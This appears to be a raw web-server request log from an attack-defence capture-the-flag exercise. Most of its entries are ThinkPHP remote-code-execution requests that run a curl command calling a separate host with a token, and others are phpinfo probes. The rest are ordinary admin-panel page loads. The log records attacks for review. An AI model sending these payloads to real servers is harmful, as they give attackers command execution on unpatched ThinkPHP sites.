GET /index.php?s=index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Host: 10.50.2.2:80
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.19.1

--------------------------------------------------
[19-11-22 12:10:07]
SRC IP: 10.51.4.129
GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=FAGMWIVI HTTP/1.1
Host: 10.50.2.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=a1aapiful277u18kj6lfr3ocg0
Upgrade-Insecure-Requests: 1

--------------------------------------------------
[19-11-22 12:12:03]
SRC IP: 10.51.4.129
GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=FAGMWIVI HTTP/1.1
Host: 10.50.2.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=a1aapiful277u18kj6lfr3ocg0
Upgrade-Insecure-Requests: 1

--------------------------------------------------
[19-11-22 12:12:24]
SRC IP: 10.51.7.46
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=BETAWOFA HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 10.50.8.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

ACCEPT-LANGUAGE: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

--------------------------------------------------
[19-11-22 12:12:24]
SRC IP: 10.51.7.46
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=BETAWOFA HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 10.50.8.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

ACCEPT-LANGUAGE: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

--------------------------------------------------
[19-11-22 12:12:24]
SRC IP: 10.51.7.46
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=BETAWOFA HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 10.50.8.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

ACCEPT-LANGUAGE: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

--------------------------------------------------
[19-11-22 12:12:24]
SRC IP: 10.51.7.46
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=BETAWOFA HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 10.50.8.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

ACCEPT-LANGUAGE: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

--------------------------------------------------
[19-11-22 12:12:24]
SRC IP: 10.51.7.46
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=BETAWOFA HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 10.50.8.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

ACCEPT-LANGUAGE: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

--------------------------------------------------
[19-11-22 12:12:25]
SRC IP: 10.51.7.46
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=BETAWOFA HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 10.50.8.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

ACCEPT-LANGUAGE: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

--------------------------------------------------
[19-11-22 12:12:30]
SRC IP: 10.51.7.46
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=BETAWOFA HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 10.50.8.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

ACCEPT-LANGUAGE: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

--------------------------------------------------
[19-11-22 12:12:36]
SRC IP: 10.51.7.46
GET //index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=BETAWOFA HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 10.50.8.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

ACCEPT-LANGUAGE: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

--------------------------------------------------
[19-11-22 12:12:56]
SRC IP: 10.51.6.126
GET /index.php?s=index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Host: 10.50.2.2:80
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.19.1

--------------------------------------------------
[19-11-22 12:13:40]
SRC IP: 10.51.2.91
GET /index.php/daili/login/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=HCWIGSKB HTTP/1.1
Host: 10.50.2.2
User-Agent: python-requests/2.19.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

--------------------------------------------------
[19-11-22 12:13:58]
SRC IP: 10.51.3.244
GET /index.php/?s=index/\think\Request/input&filter=phpinfo&data=1 HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-cn
Referer: http://10.50.2.2/index.php/?s=index/\think\Request/input&filter=phpinfo&data=1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 10.50.2.2

--------------------------------------------------
[19-11-22 12:13:58]
SRC IP: 10.51.3.244
GET /index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-cn
Referer: http://10.50.2.2/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 10.50.2.2

--------------------------------------------------
[19-11-22 12:13:58]
SRC IP: 10.51.3.244
GET /index.php/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-cn
Referer: http://10.50.2.2/index.php/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 10.50.2.2

--------------------------------------------------
[19-11-22 12:15:33]
SRC IP: 10.51.2.91
GET /index.php/daili/login/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=HCWIGSKB HTTP/1.1
Host: 10.50.2.2
User-Agent: python-requests/2.19.1
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

--------------------------------------------------
[19-11-22 12:15:40]
SRC IP: 10.51.6.67
GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Host: 10.50.2.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

--------------------------------------------------
[19-11-22 12:16:12]
SRC IP: 10.51.6.126
GET /index.php?s=index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Host: 10.50.2.2:80
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.19.1

--------------------------------------------------
[19-11-22 12:16:28]
SRC IP: 10.51.3.244
GET /index.php/?s=index/\think\Request/input&filter=phpinfo&data=1 HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-cn
Referer: http://10.50.2.2/index.php/?s=index/\think\Request/input&filter=phpinfo&data=1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 10.50.2.2

--------------------------------------------------
[19-11-22 12:16:28]
SRC IP: 10.51.3.244
GET /index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-cn
Referer: http://10.50.2.2/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 10.50.2.2

--------------------------------------------------
[19-11-22 12:16:28]
SRC IP: 10.51.3.244
GET /index.php/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-cn
Referer: http://10.50.2.2/index.php/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 10.50.2.2

--------------------------------------------------
[19-11-22 12:16:35]
SRC IP: 10.51.5.121
GET /index.php/daili/login/index.html HTTP/1.1
Host: 10.50.2.2
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

--------------------------------------------------
[19-11-22 12:16:36]
SRC IP: 10.51.5.121
GET /index.php/dsadmin/login/getverify/t/1574424995.html HTTP/1.1
Host: 10.50.2.2
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Referer: http://10.50.2.2/index.php/daili/login/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

--------------------------------------------------
[19-11-22 12:16:58]
SRC IP: 10.51.4.234
GET /index.php/daili/siyou/index.html HTTP/1.1
Referer: http://10.50.2.2/index.php/daili/index/index.html
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Accept-Encoding: gzip, deflate
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:16:59]
SRC IP: 10.51.4.234
GET /index.php/daili/siyou/index.html?page=1 HTTP/1.1
Referer: http://10.50.2.2/index.php/daili/siyou/index.html
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:17:00]
SRC IP: 10.51.4.234
GET /index.php/daili/siyou/fabushipin.html HTTP/1.1
Referer: http://10.50.2.2/index.php/daili/index/index.html
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Accept-Encoding: gzip, deflate
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:19:27]
SRC IP: 10.51.6.126
GET /index.php?s=index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Host: 10.50.2.2:80
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.19.1

--------------------------------------------------
[19-11-22 12:19:52]
SRC IP: 10.51.4.234
GET /index.php/daili/index/index.html HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Accept-Encoding: gzip, deflate
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:19:53]
SRC IP: 10.51.4.234
GET /index.php/daili/index/indexpage.html HTTP/1.1
Referer: http://10.50.2.2/index.php/daili/index/index.html
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Accept-Encoding: gzip, deflate
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:19:53]
SRC IP: 10.51.4.234
GET /index.php/daili/index/uboui/iconfont/iconfont.css HTTP/1.1
Referer: http://10.50.2.2/index.php/daili/index/indexpage.html
Accept: text/css,*/*;q=0.1
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:19:53]
SRC IP: 10.51.4.234
GET /index.php/daili/index/uboui/css/global.css HTTP/1.1
Referer: http://10.50.2.2/index.php/daili/index/indexpage.html
Accept: text/css,*/*;q=0.1
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:20:19]
SRC IP: 10.51.4.234
GET /index.php/daili/index/index.html HTTP/1.1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Accept-Encoding: gzip, deflate
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:20:20]
SRC IP: 10.51.4.234
GET /index.php/daili/index/indexpage.html HTTP/1.1
Referer: http://10.50.2.2/index.php/daili/index/index.html
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Accept-Encoding: gzip, deflate
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:20:20]
SRC IP: 10.51.4.234
GET /index.php/daili/index/uboui/css/global.css HTTP/1.1
Referer: http://10.50.2.2/index.php/daili/index/indexpage.html
Accept: text/css,*/*;q=0.1
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:20:20]
SRC IP: 10.51.4.234
GET /index.php/daili/index/uboui/iconfont/iconfont.css HTTP/1.1
Referer: http://10.50.2.2/index.php/daili/index/indexpage.html
Accept: text/css,*/*;q=0.1
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:20:22]
SRC IP: 10.51.4.234
GET /index.php/daili/index/index.html HTTP/1.1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Accept-Encoding: gzip, deflate
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:20:23]
SRC IP: 10.51.4.234
GET /index.php/daili/index/indexpage.html HTTP/1.1
Referer: http://10.50.2.2/index.php/daili/index/index.html
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Accept-Encoding: gzip, deflate
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:20:23]
SRC IP: 10.51.4.234
GET /index.php/daili/index/uboui/iconfont/iconfont.css HTTP/1.1
Referer: http://10.50.2.2/index.php/daili/index/indexpage.html
Accept: text/css,*/*;q=0.1
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:20:23]
SRC IP: 10.51.4.234
GET /index.php/daili/index/uboui/css/global.css HTTP/1.1
Referer: http://10.50.2.2/index.php/daili/index/indexpage.html
Accept: text/css,*/*;q=0.1
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:22:30]
SRC IP: 10.51.4.129
GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=FAGMWIVI HTTP/1.1
Host: 10.50.2.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=a1aapiful277u18kj6lfr3ocg0
Upgrade-Insecure-Requests: 1

--------------------------------------------------
[19-11-22 12:22:43]
SRC IP: 10.51.6.126
GET /index.php?s=index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Host: 10.50.2.2:80
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.19.1

--------------------------------------------------
[19-11-22 12:24:48]
SRC IP: 10.51.6.67
GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Host: 10.50.2.2
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1

--------------------------------------------------
[19-11-22 12:25:58]
SRC IP: 10.51.6.126
GET /index.php?s=index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Host: 10.50.2.2:80
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.19.1

--------------------------------------------------
[19-11-22 12:26:02]
SRC IP: 10.51.6.126
GET /index.php?s=index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Host: 10.50.2.2
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

--------------------------------------------------
[19-11-22 12:27:11]
SRC IP: 10.51.6.126
GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Host: 10.50.2.2
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

--------------------------------------------------
[19-11-22 12:27:56]
SRC IP: 10.51.4.234
GET /index.php/daili/siyou/index.html HTTP/1.1
Referer: http://10.50.2.2/index.php/daili/index/index.html
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Accept-Encoding: gzip, deflate
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:27:57]
SRC IP: 10.51.4.234
GET /index.php/daili/siyou/index.html?page=1 HTTP/1.1
Referer: http://10.50.2.2/index.php/daili/siyou/index.html
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363
Host: 10.50.2.2
Connection: Keep-Alive
Cookie: PHPSESSID=3jje35v1n6s7iqe2cvag5snh80

--------------------------------------------------
[19-11-22 12:29:08]
SRC IP: 10.51.3.244
GET /index.php/?s=index/\think\Request/input&filter=phpinfo&data=1 HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-cn
Referer: http://10.50.2.2/index.php/?s=index/\think\Request/input&filter=phpinfo&data=1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 10.50.2.2

--------------------------------------------------
[19-11-22 12:29:08]
SRC IP: 10.51.3.244
GET /index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-cn
Referer: http://10.50.2.2/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 10.50.2.2

--------------------------------------------------
[19-11-22 12:29:08]
SRC IP: 10.51.3.244
GET /index.php/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: zh-cn
Referer: http://10.50.2.2/index.php/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 10.50.2.2

--------------------------------------------------
[19-11-22 12:29:14]
SRC IP: 10.51.6.126
GET /index.php?s=index/%09hink%07pp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%20http://10.0.1.2?token=LBIRTMEY HTTP/1.1
Host: 10.50.2.2:80
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.19.1

--------------------------------------------------
[19-11-22 12:29:21]
SRC IP: 10.51.0.227
